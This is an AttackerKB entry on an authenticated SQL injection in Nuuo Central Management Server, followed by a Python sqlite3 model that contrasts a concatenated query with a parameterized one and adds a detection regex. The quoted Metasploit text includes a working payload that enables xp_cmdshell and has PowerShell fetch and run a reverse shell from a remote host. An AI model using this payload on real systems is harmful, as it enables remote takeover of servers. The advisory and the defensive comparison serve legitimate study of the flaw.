AttackerKB AKB:18CCBD5B-9AA6-4591-BA7F-C6C0827FC9B2
History: Nov 27, 2018 - 12:00 a.m.

Nuuo Central Management Server Authenticated SQL Server SQLi

attackerkb.com

EPSS: 0.109
Percentile: 95.2%

Nuuo Central Management Server v3.3 and prior are vulnerable to authenticated SQL injection.

Recent assessments:

jrobles-r7 at May 09, 2019 5:57pm UTC reported:

Details

Details from module documentation in Metasploit.

The GETOPENALARM verb is used to obtain information about alarms stored in the CMS Server database. An example request is below:

GETOPENALARM NUCM/1.0
DeviceID: <number>
SourceServer: <server-id>
LastOne: <number>

The vulnerability is in the "SourceServer" parameter, which allows injection of arbitrary SQL characters, and can be abused to inject SQL into the executing statement. For example the following request:

GETOPENALARM NUCM/1.0
DeviceID: 1
SourceServer: ';drop table bobby;--
LastOne: 3

Will cause the following SQL query to be executed on the server:
SELECT AlarmNo, EventType, DeviceID, Channel, EventDesc, DateTime, PreviewImage, SourceServer, AlarmID, State, Priority, Owner, HistoryNo, PosTransaction, AlarmNote, AlarmType FROM AlarmLog WHERE DeviceID=1 AND SourceServer='';drop table bobby;--' AND State<20 order by DateTime DESC

Given that SQL Server 2005 Express is used by default (see vulnerability #2), this can be abused to enable xp_cmdshell and achieve remote code execution.

As an example, here is a full working exploit that downloads a reverse shell from http://10.0.99.102/shell.exe and executes it:

';exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; declare @q varchar(8000); select @q=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; exec (@q);--

The encoded part of the exploit is the following:

xp_cmdshell 'cd C:\windows\temp\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "http://10.0.99.102/shell.exe" >> wget.ps1 && echo $file = "shell.exe" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 && cmd /c C:\windows\temp\shell.exe'

Assessed Attacker Value: 3
Assessed Attacker Value: 2
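Added example (not from the AttackerKB assessment above or the Metasploit module documentation it quotes): a Python model of the GETOPENALARM injection. It parses a request of the shape shown in the assessment, flags a SourceServer header that carries SQL metacharacters or the stored procedures used in the published RCE chain, builds the AlarmLog statement the assessment lists by string concatenation, and runs it beside a parameter-bound version so the difference is observable. sqlite3 stands in for the SQL Server 2005 Express backend; the table contents, the sample requests, the function names and the cast of DeviceID to an integer are all constructed here, not taken from the product.

```python
"""Model of the NUCM GETOPENALARM 'SourceServer' SQL injection.

Constructed example: sqlite3 stands in for SQL Server 2005 Express, the
AlarmLog rows and the 'bobby' table are invented, and the request samples
mirror the shape shown in the AttackerKB assessment.
"""
import re
import sqlite3

# Column list as it appears in the statement quoted in the assessment.
ALARM_COLUMNS = ("AlarmNo, EventType, DeviceID, Channel, EventDesc, DateTime, "
                 "PreviewImage, SourceServer, AlarmID, State, Priority, Owner, "
                 "HistoryNo, PosTransaction, AlarmNote, AlarmType")

# Bound version of the same statement: both client-controlled values become parameters.
SAFE_QUERY = (f"SELECT {ALARM_COLUMNS} FROM AlarmLog WHERE DeviceID=? "
              "AND SourceServer=? AND State<20 order by DateTime DESC")

# Constructed requests. The injected value is the one from the assessment;
# RCE_PAYLOAD_PREFIX is the opening of its xp_cmdshell chain (encoded part omitted).
BENIGN_REQUEST = "GETOPENALARM NUCM/1.0\nDeviceID: 1\nSourceServer: CMS-01\nLastOne: 3\n"
INJECTED_REQUEST = ("GETOPENALARM NUCM/1.0\nDeviceID: 1\n"
                    "SourceServer: ';drop table bobby;--\nLastOne: 3\n")
RCE_PAYLOAD_PREFIX = ("';exec sp_configure 'show advanced options', 1; reconfigure; "
                      "exec sp_configure 'xp_cmdshell', 1; reconfigure;--")

# Quotes, statement separators, comment openers, or the procedures the RCE chain needs.
SQLI_MARKERS = re.compile(r"['\";]|--|/\*|\b(xp_cmdshell|sp_configure)\b", re.IGNORECASE)


def parse_nucm_request(raw):
    """Split the line-oriented request into (verb, {header: value})."""
    lines = [line for line in raw.splitlines() if line.strip()]
    verb = lines[0].split()[0]  # e.g. "GETOPENALARM" from "GETOPENALARM NUCM/1.0"
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return verb, headers


def suspicious_source_server(value):
    """Request-side detection: True if the header looks like an injection attempt."""
    return SQLI_MARKERS.search(value) is not None


def build_vulnerable_query(device_id, source_server):
    """Concatenate the header straight into the statement, as the assessment shows.
    DeviceID is assumed to be handled as a number (it is unquoted in the quoted SQL)."""
    return (f"SELECT {ALARM_COLUMNS} FROM AlarmLog WHERE DeviceID={int(device_id)} "
            f"AND SourceServer='{source_server}' AND State<20 order by DateTime DESC")


def fresh_db():
    """In-memory stand-in: one AlarmLog row plus a throwaway table to be dropped."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        f"CREATE TABLE AlarmLog ({ALARM_COLUMNS});"
        "INSERT INTO AlarmLog VALUES (1,'motion',1,0,'lobby','2018-11-27 00:00:00',"
        "NULL,'CMS-01',100,0,1,'admin',0,NULL,NULL,0);"
        "CREATE TABLE bobby (id);"
    )
    return conn


def query_vulnerable(conn, device_id, source_server):
    """Run the concatenated text as a batch; stacked statements execute."""
    sql = build_vulnerable_query(device_id, source_server)
    conn.executescript(sql)
    return sql


def query_parameterized(conn, device_id, source_server):
    """Bind the values; the injected string is just a server name that matches nothing."""
    return conn.execute(SAFE_QUERY, (int(device_id), source_server)).fetchall()


def table_exists(conn, name):
    row = conn.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?",
                       (name,)).fetchone()
    return row[0] == 1


def demo(raw_request):
    """Parse one request, run both query styles on fresh databases, report the outcome."""
    verb, headers = parse_nucm_request(raw_request)
    concat_db, bound_db = fresh_db(), fresh_db()
    sql = query_vulnerable(concat_db, headers["DeviceID"], headers["SourceServer"])
    rows = query_parameterized(bound_db, headers["DeviceID"], headers["SourceServer"])
    return {
        "verb": verb,
        "flagged": suspicious_source_server(headers["SourceServer"]),
        "sql": sql,
        "bobby_survives_concat": table_exists(concat_db, "bobby"),
        "bobby_survives_bound": table_exists(bound_db, "bobby"),
        "rows_bound": len(rows),
    }


if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("injected", INJECTED_REQUEST)):
        print(name, demo(req))
```

sqlite3's `execute` refuses stacked statements, so the vulnerable path uses `executescript`; that stands in for a SQL Server client that submits the whole batch, which is what lets `;drop table bobby` and the `sp_configure`/`xp_cmdshell` chain run after the SELECT. The marker regex is only a request-side check for an IDS or the CMS front end; the fix that removes the bug is the bound query.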

